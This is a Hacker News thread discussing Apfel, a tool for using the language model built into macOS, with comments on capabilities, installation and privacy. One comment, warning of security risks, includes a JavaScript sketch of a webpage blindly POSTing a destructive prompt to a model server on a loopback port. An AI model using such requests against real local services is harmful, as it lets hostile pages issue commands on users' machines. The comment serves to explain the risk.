Show HN: Apfel – The free AI already on your Mac
franze
660 points
139 comments
April 03, 2026
GitHub: https://github.com/Arthur-Ficial/apfel
Related Discussions
Found 5 related stories in 65.8ms across 3,471 title embeddings via pgvector HNSW
- Show HN: I built an OS that is pure AI evanbarke · 18 pts · March 28, 2026 · 62% similar
- Show HN: Hyper – A stupidly non-corporate voice AI app for IRL conversations shainvs · 16 pts · March 11, 2026 · 62% similar
- Show HN: Axe – A 12MB binary that replaces your AI framework jrswab · 169 pts · March 12, 2026 · 61% similar
- Launch HN: RunAnywhere (YC W26) – Faster AI Inference on Apple Silicon sanchitmonga22 · 199 pts · March 10, 2026 · 60% similar
- Show HN: Crack – Turn your MacBook into a squeaky door ronreiter · 11 pts · March 22, 2026 · 59% similar
Discussion Highlights (20 comments)
skrun_dev
Notes.app handles big notebooks without choking on storage?
p1anecrazy
Really like the description of the demo CLI tools. Are they limited by the context window as well? What’s your experience with log file sizes?
khalic
AFM models are very impressive, but they’re not made for conversation, so keep your expectations low in chat mode.
elcritch
Anyone know if these are only installed on Tahoe? I'm still running Sequoia and get an error about the model not being found.
swiftcoder
Anyone tried using this as a sub-agent for a more capable model like Claude/Codex?
gigatexal
It’s a very small model, but I’ve been playing with it for some time now and I’m impressed. Have we been sleeping on Apple’s models? Imagine if they baked Qwen 3.5-level stuff into the OS. Wow, that’d be cool.
ramon156
Cool tool, but I don't get why these websites make idiotic claims.
> $0 cost
No kidding. Why not just link the GitHub repo? https://github.com/Arthur-Ficial/apfel
brians
I’ve seen several projects like this that offer a network server with access to these Apple models. The danger is when they expose that, even on a loopback port, to every other application on your system, including the browser. Random webpages are now shipping with JavaScript that will POST to that port. Same-origin restrictions will stop data flowing back to the webpage, but that doesn’t stop them from issuing commands to make changes. Some such projects use CORS to allow reading back as well. I haven’t read Apfel’s code yet, but I’m registering the experiment before performing it.
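The "fire and forget" risk described above is easy to sketch. A minimal, hypothetical example — the port `11435` and the `/chat` path are invented here, not taken from Apfel — showing that same-origin policy only stops a page from *reading* the response, not from *sending* the request to a loopback server:

```javascript
// Hypothetical sketch of the attack described above. Port 11435 and the
// /chat path are invented; any webpage's JavaScript can attempt this.
async function blindPost(port, path, body) {
  try {
    // In a browser this would add { mode: "no-cors" }; a text/plain
    // content type keeps it a "simple" request, so no CORS preflight
    // is sent before the POST goes out.
    const res = await fetch(`http://127.0.0.1:${port}${path}`, {
      method: "POST",
      headers: { "Content-Type": "text/plain" },
      body: JSON.stringify(body),
    });
    return `fired (status ${res.status})`;
  } catch {
    // Opaque response or connection refused -- the attacker neither
    // knows nor cares; the command may already have been acted on.
    return "fired (response unreadable)";
  }
}

blindPost(11435, "/chat", { prompt: "do something destructive" })
  .then(console.log);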
Oras
I like the idea and the clarity in explaining the usage. My question would be: what kinds of tasks would it be useful for?
convexly
I like the approach of running everything locally. I'm strongly of the opinion that the privacy angle for local models is going to keep getting stronger and more relevant. The more articles come out about accidents caused by people handing too much context to cloud models, the more self-reinforcing this will become.
arendtio
For those who don't know, 'Apfel' is the German word for Apple.
VanTodi
Just a small thing about the website: on mobile, your examples shift all the elements below them when they change, making the page jump around randomly while you're trying to read.
gherkinnn
Now this is a development I like. With the Claude bug, as it's known, burning through tokens at record speed, I gave alternative models a try, and they're mostly ... interchangeable. I don't know how ease of switching, low brand loyalty, and fast-moving markets will play out. I hope that local LLMs become very viable very soon.
m-s-y
A serious project would do the work to be delivered via the main Homebrew repository, not a self-hosted tap.
nose-wuzzy-pad
Does the local LLM have access to personal information from the Apple account associated with the logged-in user? Maybe through a RAG pipeline or similar? Just curious if there are any risks associated with exposing this in a way that could be exploited via CORS or through another rogue app querying it locally.
phplovesong
This is pretty cool. My bet is that we'll have more LLMs running locally where possible, either through "better hardware as the default" or some new tech that can run the models on commodity hardware (like Apple Silicon or an equivalent PC setup).
alwinaugustin
Read Austria as Australia and thought this was an April Fools' joke.
nottorp
> Starting with macOS 26 (Tahoe), every Apple Silicon Mac includes a language model as part of Apple Intelligence.

So you have to put up with the low-contrast, buggy UI to use that.
mattkevan
As an experiment I built a prototype chatbot app that uses the built-in LLM. It’s got a small context window, but is surprisingly capable and has tool-calling support. Without too much effort I was able to get it to fetch weather data, fetch and summarise emails, read and write reminders and calendar events.
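For readers wondering what such a tool-calling loop looks like under the hood, here is a generic sketch — this is not Apple's FoundationModels API; the tool name and the stub "model" are invented for illustration. The model either answers directly or names a tool plus arguments; the host executes the tool and feeds the result back until a final answer arrives:

```javascript
// Generic tool-calling loop. The tools table and fakeModel below are
// stand-ins for a real tool registry and a real LLM call.
const tools = {
  getWeather: ({ city }) => `18°C and cloudy in ${city}`,
};

// Pretend model: emits either a final answer or a structured tool
// request, mimicking the output shape of a tool-capable LLM.
function fakeModel(messages) {
  const last = messages[messages.length - 1];
  if (last.role === "tool") {
    return { type: "answer", text: `The weather: ${last.content}` };
  }
  return { type: "tool_call", name: "getWeather", args: { city: "Vienna" } };
}

function runConversation(prompt) {
  const messages = [{ role: "user", content: prompt }];
  for (let step = 0; step < 5; step++) {       // cap the loop
    const out = fakeModel(messages);
    if (out.type === "answer") return out.text;
    const result = tools[out.name](out.args);  // execute the requested tool
    messages.push({ role: "tool", content: result });
  }
  return "gave up";
}

console.log(runConversation("What's the weather like?"));
// → "The weather: 18°C and cloudy in Vienna"
```

The same shape works for the email, reminders, and calendar tools mentioned above: each is just another entry in the tool table.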
joriskok1
How much storage does it take up?